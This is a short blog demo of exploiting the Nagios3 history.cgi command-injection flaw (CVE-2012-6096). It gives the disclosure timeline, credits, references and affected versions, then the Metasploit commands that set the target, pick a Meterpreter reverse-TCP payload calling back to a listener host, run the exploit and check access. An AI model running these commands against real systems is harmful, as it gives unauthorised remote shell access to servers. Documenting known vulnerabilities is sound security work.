Tag Archives: CVE-2012-6096

CVE-2012-6096 Nagios3 history.cgi Vulnerability Metasploit Demo

Timeline :

Vulnerability reported on Full Disclosure by Aris temp66 the 2012-12-09
PoC provided by blasty the 2013-01-10
Metasploit PoC provided the 2013-01-15

PoC provided by :

Unknown (temp66)
blasty
Jose Selvi
Daniele Martini

Reference(s) :

CVE-2012-6096
OSVDB-88322
BID-56879
Full Disclosure

Affected version(s) :

Nagios 3.4.3 and previous

Tested on Debian 5.0.10 with :

nagios3_3.0.6-4~lenny2_i386.deb

Description :

This module abuses a command injection vulnerability in the Nagios3 history.cgi script. An alert show exist in history.cgi web page.

Commands :

use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo